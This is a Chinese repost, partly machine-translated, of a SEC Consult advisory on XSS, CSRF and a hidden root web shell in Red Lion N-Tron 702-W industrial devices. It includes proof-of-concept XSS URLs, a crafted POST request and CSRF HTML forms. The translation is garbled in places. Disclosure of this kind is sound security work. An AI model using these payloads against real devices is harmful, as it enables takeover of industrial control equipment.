Red Lion N-Tron 702-W / 702M12-W 2.0.26 XSS / CSRF / Shell漏洞—Hack之路

Red Lion N-Tron 702-W / 702M12-W 2.0.26 XSS / CSRF / Shell漏洞
产品:Red Lion N-Tron 702-W,Red Lion N-Tron 702M12-W
易受攻击的版本:<= 2.0.26
固定版本:
CVE编号:CVE​​-2020-16210,CVE-2020-16206,CVE-2020-16208,
CVE-2020-16204
影响:高
主页:https://www.redlion.net/
找到:2020-02-28
作者:T. Weber(维也纳办公室)
SEC咨询漏洞实验室

SEC Consult的组成部分
欧洲|亚洲|北美

https://www.sec-consult.com

供应商说明:
——————-
“四十年来,世界各地的客户都信任红狮
控件。我们屡获殊荣的工业自动化和
网络解决方案可提供关键信息和控制
通过使用多种设备和各种设备来提高生产率
访问数据的协议。”

资料来源:https://www.redlion.net

业务推荐:
————————
供应商建议更改硬件并使用更新的产品。
SEC Consult建议从生产环境中删除该设备。

漏洞概述/说明:
———————————–
1)反映式跨站点脚本(XSS)-CVE-2020-16210
在端点处发现了反映的跨站点脚本漏洞
“ /pingtest_action.cgi”。攻击者还可以在
受攻击用户的上下文。

2)存储的跨站点脚本(XSS)-CVE-2020-16206
在多个端点上都存在存储的跨站点脚本漏洞。
这样放置的有效负载无法通过浏览器保护机制检测到,例如
它们被嵌入到Web界面中。
攻击者还能够在被攻击用户的上下文中执行操作。

3)跨站请求伪造(CSRF)-CVE-2020-16208
根本不实施CSRF保护。
此类漏洞使攻击者可以修改以下内容的不同配置:
通过诱使经过身份验证的用户单击精心设计的链接来创建设备。一个
攻击者可以利用此漏洞来接管设备。

4)隐藏的OS Web-Shell界面-CVE-2020-16204
一个未记录的界面(包含指向底层操作系统的Web外壳)是
被发现存在于设备上。实际菜单中未引用
并且在设备手册中也未提及。
可以在设备上以root用户身份执行命令。远程攻击者可以执行
通过这种方式与漏洞3结合使用系统命令。

该端点似乎是所用Atheros SDK的剩余部分。

5)已知的BusyBox漏洞
版本1.11.0中使用的BusyBox工具包已过时,并且包含多个
已知漏洞。 IoT Inspector发现了过时的版本。

6)过时且易受攻击的软件组件
在此期间,设备上发现过时且易受攻击的软件组件
快速检查。

漏洞1),2),3),4)和5)已在仿真中手动验证
设备使用MEDUSA可扩展固件运行时。

漏洞验证

1) 反映式跨站脚本(XSS)-CVE-2020-16210
“ pingtest_action.cgi”端点可用于触发反射的XSS。
http://$IP/pingtest_action.cgi?action=pingtest&dst_ip_addr=1&dst_addr_select=127.0.0.1&lines=%3Chtml%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3C/html%3E
2) 存储的跨站点脚本(XSS)-CVE-2020-16206
可以在多个端点上注入XSS有效负载。 一个例子
对于端点“ /network.cgi”上的永久XSS,是以下请求:
-------------------------------------------------------------------------------
POST /network.cgi HTTP/1.1
Host: $IP
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------195698564115308644282115103021
Content-Length: 915
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: ui_language=en_US
Upgrade-Insecure-Requests: 1
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="netmode"
bridge
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="wlanipmode"
0
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brip"
192.168.1.202
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brmask"
255.255.255.0
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brgw"
192.168.1.1"><script>alert(document.location)</script>
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="dns1"
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="dns2"
-----------------------------195698564115308644282115103021--
-------------------------------------------------------------------------------
也可以将其嵌入HTML代码中,如下所示:This can also be embedded in the HTML code as shown below:
-------------------------------------------------------------------------------
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://$IP/network.cgi" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="netmode" value="bridge" />
      <input type="hidden" name="wlanipmode" value="0" />
      <input type="hidden" name="brip" value="192.168.1.202" />
      <input type="hidden" name="brmask" value="255.255.255.0" />
      <input type="hidden" name="brgw" value="192.168.1.1"><script>alert(document.location+" > SEC-Consult")</script>" />
      <input type="hidden" name="dns1" value="" />
      <input type="hidden" name="dns2" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-------------------------------------------------------------------------------
3) 跨站请求伪造(CSRF)-CVE-2020-16208
可以在每个端点上触发CSRF,因为整个Web界面不
实施任何保护机制。 将主机名更改为“ SEC Consult”可以
可以使用以下嵌入式HTML代码完成:
-------------------------------------------------------------------------------
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://$IP/system.cgi" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="hostname" value="SEC Consult" />
      <input type="hidden" name="action" value="chhost" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-------------------------------------------------------------------------------
4)隐藏的OS Web-Shell界面-CVE-2020-16204
在整个Web界面中未引用终结点“ /admin.cgi”,并且
手册中也没有记录。 通过浏览此端点,可以执行多个操作
可以本地触发:
*在root用户的上下文中执行命令
* 上传文件
*下载文件
*更改访问权限
其他所有动作都可以通过命令执行来完成。 缺乏CSRF
保护措施使攻击者可以通过诱使攻击者在设备上执行命令
恶意网页上的用户。
5) 已知的BusyBox漏洞
已在上验证了BusyBox shell自动完成漏洞(CVE-2017-16544)
模拟设备:
A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
55\;test.txt
#
-------------------------------------------------------------------------------
6) 过时的软件组件
通过分析固件,发现许多组件已过时:
 * BusyBox 1.0.1
 * PHP/FI 2.0.1
 * Dnsmasq 2.35
 * Boa 0.93.15
脆弱/经过测试的版本:
-----------------------------
以下固件版本已经过测试:
*红狮N-Tron 702-W / 2.0.26
*红狮N-Tron 702M12-W / 2.0.26* Red Lion N-Tron 702M12-W / 2.0.26
供应商联系时间表:
------------------------
2020-03-09:通过support.emea@redlion.net与供应商联系; 没有答案。
2020-03-17:要求更新状态; 没有答案。
2020年3月30日:要求更新状态,将呼入.ics-cert @ redlion.net添加到
收件人名单; 没有答案。
2020-04-13:请求CERT @ VDE为协调提供支持。
已将咨询发送给CERT。
2020-04-14:来自CERT @ VDE的安全联系人回答说ICS-CERT也处于
形成。
2020-07-17:要求ICS-CERT联系人更新状态; 联系人说
他们正在等待Red Lion的更新。
2020-08-20:收到来自CERT @ VDE的CISA征求意见稿。
2020-08-28:在CISA网站*上找到了已发布的公告,该公告已发布
在2020-08-27。
2020-09-02:发布安全公告。2020-09-02: Release of security advisory.
* https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01

解:
———
升级到较新的硬件。

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/14/red-lion-n-tron-702-w-702m12-w-2-0-26-xss-csrf-shell%e6%bc%8f%e6%b4%9e-hack%e6%bc%8f%e6%b4%9e/

发表评论

邮箱地址不会被公开。 必填项已用*标注